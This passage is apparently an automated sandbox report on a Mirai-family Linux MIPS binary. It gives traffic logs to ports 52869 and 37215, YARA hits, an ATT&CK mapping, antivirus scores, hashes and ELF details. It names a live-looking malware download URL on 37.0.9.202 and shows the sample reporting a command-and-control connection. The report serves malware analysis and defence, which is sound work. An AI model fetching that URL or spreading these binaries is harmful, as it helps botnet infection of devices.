    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53976 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54542 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 57466
    Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 57468
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45032 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59916 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: /tmp/KHSQ48GkGn (PID: 5238) Queries kernel information via 'uname':
    Source: KHSQ48GkGn, 5238.1.000000004cffab3f.00000000008c8373.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/KHSQ48GkGnSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/KHSQ48GkGn
    Source: KHSQ48GkGn, 5238.1.00000000b21f652b.00000000ecc012f9.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/mips
    Source: KHSQ48GkGn, 5238.1.00000000b21f652b.00000000ecc012f9.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
    Source: KHSQ48GkGn, 5238.1.000000004cffab3f.00000000008c8373.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips

    Stealing of Sensitive Information:

    Yara detected Mirai
    Source: Yara match. File source: dump.pcap, type: PCAP

    Remote Access Functionality:

    Yara detected Mirai
    Source: Yara match. File source: dump.pcap, type: PCAP

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Direct Volume Access | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap |  | Carrier Billing Fraud

    Malware Configuration

    No configs have been found

    Behavior Graph

    [Figure: behavior graph, ID 513296. Sample: KHSQ48GkGn; start date: 02/11/2021; architecture: LINUX; score: 76. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Number of created Files, Is malicious, Internet.]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    KHSQ48GkGn | 62% | Virustotal |
    KHSQ48GkGn | 64% | ReversingLabs | Linux.Trojan.Mirai

    Dropped Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://127.0.0.1:52869/picdesc.xml | 0% | Virustotal |
    http://127.0.0.1:52869/picdesc.xml | 0% | Avira URL Cloud | safe
    http://37.0.9.202/bins/Hilix.mips | 9% | Virustotal |
    http://37.0.9.202/bins/Hilix.mips | 100% | Avira URL Cloud | malware
    http://127.0.0.1:52869/wanipcn.xml | 0% | Virustotal |
    http://127.0.0.1:52869/wanipcn.xml | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://127.0.0.1:52869/picdesc.xml | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
    http://127.0.0.1:52869/wanipcn.xml | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://schemas.xmlsoap.org/soap/encoding/ | KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp | false | | high
    http://37.0.9.202/bins/Hilix.mips | KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp | true | 9%, Virustotal, Browse; Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/soap/envelope/ | KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp | false | | high

        Contacted IPs


        Runtime Messages

        Command:/tmp/KHSQ48GkGn
        Exit Code:0
        Exit Code Info:
        Killed:False
        Standard Output:
        Connected To CNC
        Standard Error:

        Joe Sandbox View / Context

        IPs

        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
        91.181.131.206 | dTmYFku6X8 | Get hash | malicious | Browse |
        107.112.85.166 | hWT9RJDotD | Get hash | malicious | Browse |
        41.37.180.38 | Hilix.arm7 | Get hash | malicious | Browse |

              Domains

              No context

              ASN


              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              /proc/5282/oom_score_adj
              Process:/usr/sbin/sshd
              File Type:ASCII text
              Category:dropped
              Size (bytes):6
              Entropy (8bit):1.7924812503605778
              Encrypted:false
              SSDEEP:3:ptn:Dn
              MD5:CBF282CC55ED0792C33D10003D1F760A
              SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
              SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
              SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
              Malicious:false
              Reputation:high, very likely benign file
              Preview: -1000.

              /run/sshd.pid
              Process:/usr/sbin/sshd
              File Type:ASCII text
              Category:dropped
              Size (bytes):5
              Entropy (8bit):1.9219280948873623
              Encrypted:false
              SSDEEP:3:CF:CF
              MD5:77E31130E90E9883A9065686679D54C0
              SHA1:9EB2EFEC6EC51EAA639F2D599C5EC6DBEC86364A
              SHA-256:EBCC6D4C0E3D89DCD951179B37A6B54CE9B4BB2F26A4E8EF448BAE0C67B074B2
              SHA-512:B92DC2F240498F724A465012B966B0E71911714970CFC01D244F01B9C39DF182C362E24FE3A8A8B2571342A81E185369095326FB7B8AA6A1D4A79B75B95A8162
              Malicious:false
              Reputation:low
              Preview: 5282.

              Static File Info

              General

              File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
              Entropy (8bit):5.532720047701684
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:KHSQ48GkGn
              File size:77284
              MD5:905f7222e4cc69941935cdef4fa16246
              SHA1:84210b6c2c580b67c433e56c0d41831ce17bdd74
              SHA256:cd091f9f91f748395e30fa49ed2c4fc9e68247d5e9ae08982d5a2fb3ed074280
              SHA512:248640416fb1fe7276cd1f1d05c3fc444e5aff292103ebb95032abf5af1fe012a49756a36406f00d6dc5c10f01fcc7134cea28f266ac0af9581d489c1f7b7d6c
              SSDEEP:1536:aVNzbOfVDFKxJrilJTlzE0eGT2oBjnknutbjopj/Mf8bI3mC:aVdbS8rivlzE0eGT2oB4KjopzM0LC

              Static ELF Info

              ELF header

              Class:ELF32
              Data:2's complement, big endian
              Version:1 (current)
              Machine:MIPS R3000
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x400260
              Flags:0x1007
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:76724
              Section Header Size:40
              Number of Section Headers:14
              Header String Table Index:13

              Sections

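              Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
              | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
              .init | PROGBITS | 0x400094 | 0x94 | 0x8c | 0x0 | 0x6 | AX | 0 | 0 | 4
              .text | PROGBITS | 0x400120 | 0x120 | 0x11230 | 0x0 | 0x6 | AX | 0 | 0 | 16
              .fini | PROGBITS | 0x411350 | 0x11350 | 0x5c | 0x0 | 0x6 | AX | 0 | 0 | 4
              .rodata | PROGBITS | 0x4113b0 | 0x113b0 | 0x1180 | 0x0 | 0x2 | A | 0 | 0 | 16
              .ctors | PROGBITS | 0x452534 | 0x12534 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
              .dtors | PROGBITS | 0x45253c | 0x1253c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
              .data.rel.ro | PROGBITS | 0x452548 | 0x12548 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
              .data | PROGBITS | 0x452550 | 0x12550 | 0x250 | 0x0 | 0x3 | WA | 0 | 0 | 16
              .got | PROGBITS | 0x4527a0 | 0x127a0 | 0x3b0 | 0x4 | 0x10000003 | WA | 0 | 0 | 16
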